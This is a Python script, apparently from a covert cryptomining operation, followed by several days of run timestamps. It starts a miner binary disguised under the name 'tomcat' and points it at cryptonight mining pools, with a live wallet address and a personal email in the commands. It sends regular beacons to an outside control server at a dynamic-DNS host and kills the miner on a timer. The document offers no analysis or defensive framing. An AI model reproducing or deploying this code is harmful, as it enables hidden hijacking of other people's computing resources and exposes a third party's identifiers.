import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:03:01.612666
#2018-02-17 16:49:04.602589
#2018-02-17 18:37:07.136811
#2018-02-17 20:24:07.734299
#2018-02-17 22:12:04.390957
#2018-02-17 23:56:04.997891
#2018-02-18 01:47:02.122516
#2018-02-18 03:33:01.706502
#2018-02-18 05:21:07.243868
#2018-02-18 07:13:01.357330
#2018-02-18 09:01:06.156099
#2018-02-18 10:48:05.889202
#2018-02-18 12:36:05.314658
#2018-02-18 14:22:07.695789
#2018-02-18 16:13:01.387037
#2018-02-18 18:01:01.746368
#2018-02-18 19:48:01.472227
#2018-02-18 21:34:02.980257
#2018-02-18 23:23:03.637889
#2018-02-19 01:10:06.487970
#2018-02-19 02:56:04.801133
#2018-02-19 04:43:04.190257
#2018-02-19 06:27:06.179874
#2018-02-19 08:17:04.963376
#2018-02-19 10:06:04.108297
#2018-02-19 11:55:09.345595
#2018-02-19 13:41:10.277933
#2018-02-19 15:29:05.155896
#2018-02-19 17:18:01.248730
#2018-02-19 19:06:01.600766
#2018-02-19 20:51:02.224614
#2018-02-19 22:39:01.413120
#2018-02-20 00:23:05.702768
#2018-02-20 02:12:04.170650
#2018-02-20 04:02:07.286935
#2018-02-20 05:46:06.285390
#2018-02-20 07:32:06.545183
#2018-02-20 09:17:01.750577
#2018-02-20 11:01:01.236464
#2018-02-20 12:47:10.065632
#2018-02-20 14:33:09.609183
#2018-02-20 16:18:01.807029
#2018-02-20 18:05:07.294242
#2018-02-20 19:56:07.996374
#2018-02-20 21:45:04.005745
#2018-02-20 23:25:05.891682
#2018-02-21 01:10:09.570266
#2018-02-21 02:58:05.680266
#2018-02-21 04:46:06.853634
#2018-02-21 06:36:06.747180
#2018-02-21 08:22:01.448762
#2018-02-21 10:07:06.316811
#2018-02-21 11:56:09.463778
#2018-02-21 13:46:06.496933
#2018-02-21 15:33:09.265857
#2018-02-21 17:23:01.729123
#2018-02-21 19:12:09.185813
#2018-02-21 21:01:06.418689
#2018-02-21 22:47:04.350267
#2018-02-22 00:37:06.344430
#2018-02-22 02:24:06.357691
#2018-02-22 04:11:05.247987
#2018-02-22 05:55:06.776708
#2018-02-22 07:41:05.053972
#2018-02-22 09:29:04.280298
#2018-02-22 11:15:11.410855
#2018-02-22 13:03:07.348727
#2018-02-22 14:50:10.621702
#2018-02-22 16:36:04.793788
#2018-02-22 18:21:08.207752
#2018-02-22 20:13:05.702706
#2018-02-22 21:59:06.307111
#2018-02-22 23:46:11.151189
#2018-02-23 01:36:07.983399
#2018-02-23 03:23:05.256073
#2018-02-23 05:09:01.741023
#2018-02-23 06:54:01.524201
#2018-02-23 08:37:05.166740
#2018-02-23 10:52:02.240656
#2018-02-23 12:48:07.894357
#2018-02-23 14:32:06.838259
#2018-02-23 16:21:09.719298
#2018-02-23 18:07:06.646077
#2018-02-23 19:52:08.908189
#2018-02-23 21:36:02.220836
#2018-02-23 23:23:02.165094
#2018-02-24 01:16:07.902869
#2018-02-24 03:07:06.277612
#2018-02-24 04:53:05.772266
#2018-02-24 06:37:02.088183
#2018-02-24 08:26:05.110525
#2018-02-24 10:12:05.297995
#2018-02-24 12:07:04.931138
#2018-02-24 13:55:07.632974
#2018-02-24 15:48:04.191944
#2018-02-24 17:41:05.255148
#2018-02-24 19:25:08.082247
#2018-02-24 21:15:07.701328
#2018-02-25 01:19:06.718881
#2018-02-25 05:21:04.808613
#2018-02-25 11:34:05.295930